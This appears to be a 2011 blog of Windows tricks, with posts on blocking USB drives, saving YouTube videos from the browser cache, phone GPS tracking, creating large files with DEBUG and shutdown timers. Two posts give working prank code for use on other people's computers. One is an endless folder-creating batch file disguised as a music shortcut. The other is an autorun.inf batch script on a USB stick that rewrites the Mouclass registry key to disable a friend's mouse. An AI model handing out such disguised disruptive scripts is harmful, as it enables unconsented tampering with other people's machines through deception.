February 3, 2011

SOFTWARE TO BLOCK PENDRIVES IN YOUR COMPUTERS

It’s possible to simply disable USB ports support in PC BIOS in order to prevent and forbid computer user from using USB removable flash drive or mass storage device (Portable hard disk drive) to copy and transfer data and files. 


But there is another way to do it..


1.First of all you download this file .
2.After that open that file



  3.then make the changes.


If you want to disable/enable or disable USB drives on your Windows systems - across your LANthen you need to download this file


NOTE: combined versions is available at http://www.intelliadmin.com/USBDisablerPro.msi (trial use only)..

January 26, 2011

DOWNLOAD/SAVE YOUTUBE VIDEO WITHOUT ANY SOFTWARE OR ANY CODES



Its just a trick to save youtube video from browser cache files..

1.Goto youtube website...
2.Click the video which you want to download...
3.Then play the song....
4.After that goto cache folder

For chrome,
C:\Users\Administrator(Select your user account)\\AppData\Local\Google\Chrome\User Data\Default\Cache
Then right click->sort by->size
(For other browser this location may vary ,just do googling...

5.The files which starts with "f_" is your video file(ex: f_000f11)...
6.Then rename those files with extension .flv(ex: f_000f11.flv)
7.Double click that file to see the video.(flv extension is playable on VLC media player and like them)

For any doubts or if  you dont know about your  browser cache file location feel free to give a comments..........

January 23, 2011

Make over 1,000 folders in few seconds


Here I will teach you simple prank that will make an unlimmited amount of folders in any place you want.

Step 1
Open notepad and type :
@echo off
:top
md %random%
goto top

@echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top , infinite loop

Step 2
Save it as 1000folders.bat

After that you will get icon that looks as show below

People probably not going to click on an icon that looks like this picture so to make it better (funnier and easier to prank people with) make a short-cut to it
Step 3
Right click on icon and click Create Shortcut

Step 4
Right click on shortcut and click properties , then click on Change Icon and rename icon



tell the person that you found the music they wanted and downloaded it on there computer, that way they will think its a shortcut to the music and they will click on it then they will think its loading so they wont exit right away when they finally realize its not going to load or so many errors have came up they realized
somethings wrong it will be to late) also just something to know its impossible to delete them using cmd you HAVE to find all of them and delete them manually…

January 21, 2011

TRACE YOUR EXACT POSITION OF YOUR MOBILE FOR FREE

gps phone tracking on Google Maps


Want to trace your mobile phone without any cost...


1.All you need is a Phone or PDA with built in GPS, or with Bluetooth GPS receiver.


2.Goto buddyway website


3.Register your mobile and download the applicaction to your mobile phone


4.By this you can.....

  • Track & save your trips
  • Share them with friends
  • View your trips in 3D in Google Earth
  • Show friends your location

5.Its also used to find your mobiles when the mobile is stolen by others.

January 20, 2011

Disable Your Friend’s Mouse Whenever USB Disk Is Inserted


In this short time pass tutorial, I am going to show you how to disable your friend’s mouse whenever your USB drive is inserted.
To get this feature working, you must make sure that your friend has not disabled autorun for removable media. However you may get this to work by creating a fake icon for the batch program.
First we’ll create a batch file and then we’ll be creating autorun.inf file. Then we’ll be pasting it in the root of USB drive. Now whenever the USB drive is inserted, system will look for autorun.inf. Autorun.inf will execute that batch file disabling the mouse.
@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
Copy the above code in notepad and save it as “filename.bat”
The above code will disable the mouse by deleteing the registry key of Mouclass and again adds data = 0×00000004 to the valuename = “Start”
Note: The above image is only demonstrates where the action will be taken by the above batch script. It has to do nothing with the procedure of this tutorial.
[autorun]
Open=filename.bat
Action=Mouse Disable
The above code goes for autorun.inf. Open notepad, copy and paste the above code in it and save it as “autorun.inf”.
Now copy both of the file in your or your friend’s USB drive. Then let it do the magic.
To re-enable the mouse you’ll just have to change the value 0×00000004 to 0×00000001. To do so, simply create another batch file with following script:
@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 1
Hope this tutorial was fun trying to.

January 17, 2011

Create A Huge File - Fun Trick



FIRST STEP:


You can create a file of any size using nothing more than what's supplied with Windows.
Start by converting the desired file size into hexadecimal notation. You can use the Windows Calculator in Scientific mode do to this. Suppose you want a file of 1 million bytes. Enter 1000000 in the calculator and click on the Hex option to convert it (1 million in hex is F4240.) Pad the result with zeroes at the left until the file size reaches eight digits—000F4240.

SECOND STEP:


1.Now open a command prompt window.

2.In Windows 95, 98, or Me, you can do this by entering COMMAND in the Start menu's Run dialog; in Windows NT 4.0, 2000, XP or higher enter CMD instead. Enter the command DEBUG BIGFILE.DAT(here bigfile.dat is example,you can enter any filename with any extension) and ignore the File not found message.

3.Type RCX and press Enter. Debug will display a colon prompt. Enter the last four digits of the hexadecimal number you calculated (4240, in our example).

4.Type RBX and press Enter, then enter the first four digits of the hexadecimal size (000F, in our example). Enter

5.W for Write and Q for Quit. You've just created a 1-million-byte file using Debug. Of course you can create a file of any desired size using the same technique.

January 16, 2011

Auto Shutdown Pc without using any external program( 3 methods )






METHOD # 1


Do you know that you can make your PC shutdown at a time u wish to?
Here is the trick!!
How To Make A Shutdown Timer!

Step 1:

Right click on your desktop and choose "New=>shortcuts".

Step 2:

In the box that says "Type the location of the shortcut",
type in "shutdown -s -t 3600" without the quotation marks and click next.

Note: 3600 are the amount of seconds before your computer shuts down. So , 60secs*60mins=3600secs.

Step 3:

Make up a name for the shortcut and you're done.
You can change the icon by right clicking=>properities=>change icon=>browse.

To abort:

To make an abort key to stop the shutdown timer just create another shortcut and make
the "location of the shortcut" to " shutdown -a" without the quotes.


METHOD # 2


Here is another trick to shutdown at a specific time, for example you wish to shutdown at 11:35am. Type this in
start=>Run

Type Code: at 11:35 shutdown -s


to abort

Code:

shutdown -a


take note: all time are in 24hr, example u would like to shutdown at 8:30pm, you should type

"at 20:30 shutdown -s" without quote



METHOD # 3


you can use a batch for that as well it makes it easier to use
just run the batch and enter the time you want it to shutdown

shutdown.bat
Type Code:
@echo off
title Scheduled Shutdown Batch Example by chacha1234
color A
echo Enter Time To Shutdown (example 19:30)
set /p stime=
cls
at %stime% ""shutdown -s -t 00"" >nul
echo Your PC Will Auto Shutdown At %stime%
echo Press Any Key To Exit
pause >nul
exit



also you can add -c "desired message" at the end of the shutdown command
for example
shutdown -s -t 60 -c "Shutdown Pc"


using this command u can also schedule ur pc to restart
for example
shutdown -r -t 60 -c "Restarting Pc"